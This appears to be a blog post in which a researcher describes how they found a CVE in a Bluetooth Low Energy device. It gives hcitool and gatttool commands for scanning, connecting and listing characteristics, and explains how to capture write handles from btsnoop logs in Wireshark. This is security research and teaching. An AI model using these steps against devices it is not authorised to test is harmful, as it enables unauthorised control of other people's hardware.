Member-only story
This blog is not about any bounty tricks moreover it’s based on the CVE I received this year on a product.
In our daily scenarios we have been using Bluetooth technology for connecting headphones, mouse, smartwatch, etc …but have you ever thought of finding bugs on that device?
What if you can connect the device without pairing it with your phone and perform any particular action :D sounds interesting right 😉
So let’s start and see how I controlled the device via my terminal.
Okay!! While performing any BLE attack you need few tools such as:
· CSR dongle 4.0 or 5.0 (depends on which Bluetooth version the device is working in my case it was 4.0)
· Android phone of course
· Device itself on which you want to attack
In the very first phase, we must do some recon to identify the address of BLE.
Command-hcitool -i hci1 lescan
Once we have gathered the address we can further move forward to connect the device using gatttool
Command-gatttool -I -I hci1 -b <ble address>
Now, to get information about service and characteristics
Command-primary
In the screenshot above information given is attribute group handle and uuid of specific device 1801 is used for general information like device name, appearance, etc.
To identify the characteristics use
Command- char-desc
Now, we have gathered a lot of information it’s time to play the game with the device.
During the communication with the device, I started the Android mobile application and started ON and OFF, so all these interactions get recorded in the btsnoop log file.
Once you retrieve the log file from the phone named btsnoop_hci.log, open it with Wireshark and apply filter “btatt” to analyze the write command with handle as shown in the screenshot.
